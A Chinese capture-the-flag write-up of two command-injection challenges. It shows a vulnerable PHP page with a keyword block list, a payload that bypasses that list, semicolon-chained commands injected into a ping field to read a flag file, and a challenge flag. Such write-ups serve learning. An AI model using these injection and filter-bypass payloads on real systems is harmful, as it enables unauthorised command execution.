[TOC]

[MoeCTF 2021]babyRCE

考点:关键词过滤

来源:nssctf

1
2
3
4
5
6
7
8
9
10
11
12
 <?php

$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}

先用ls查看

image-20241019170841483

构造payload:

1
?rce=ca\t${IFS}fl\ag.php

image-20241019170919138

注意:1.有时候使用cat会一片空白,需要查看源码

2.允许的条件下,可以先用ls,再用cat

command_execution

考点:命令执行

来源:攻防世界

image-20241019182142415

先ping一下127.0.0.1

image-20241019182650673

再用;来连接两个命令 127.0.0.1;ls

image-20241019182844520

试试看能不能查看inddex.php

127.0.0.1;cat index.php

image-20241019183259450

很明显,不行,那就退级看看

image-20241019183409397

在home中发现flag。

image-20241019183459124

查看flag

127.0.0.1;cat …/…/…/home/flag.txt

image-20241019173221179

1
cyberpeace{ac541782e73fa1da4a98ec4bc3449fb1}